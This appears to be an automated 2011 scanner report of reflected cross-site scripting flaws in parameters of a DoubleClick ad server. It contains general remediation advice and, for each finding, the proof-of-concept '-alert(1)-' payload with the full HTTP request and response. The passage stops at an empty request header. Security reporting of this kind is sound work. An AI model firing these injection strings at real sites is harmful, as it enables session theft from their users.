Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb9a'-alert(1)-'9f8b5bd9678 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea05f"-alert(1)-"d7405e6c27 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:15 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5828
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bh%3Dv8/3aa7/f/7d/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b345"-alert(1)-"d5c45be131d was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = " ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a23'-alert(1)-'2677801c6b9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a56a1'-alert(1)-'9136e52bb72 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5832 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:27:28 GMT Expires: Mon, 07 Feb 2011 02:27:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93598"-alert(1)-"2cf0fabfdd0 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5832 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:27:23 GMT Expires: Mon, 07 Feb 2011 02:27:23 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e079"-alert(1)-"2a7444a0285 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:26:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscr ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60df4'-alert(1)-'c9f82baf3eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee78"-alert(1)-"efef978bc1a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5940
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a7dc'-alert(1)-'55516c4309 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5936
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bh%3Dv8/3aa7/f/7d/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\"> ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51b4"-alert(1)-"a1b3e2ed110 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5940
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcal ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c2c'-alert(1)-'91bc6693606 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
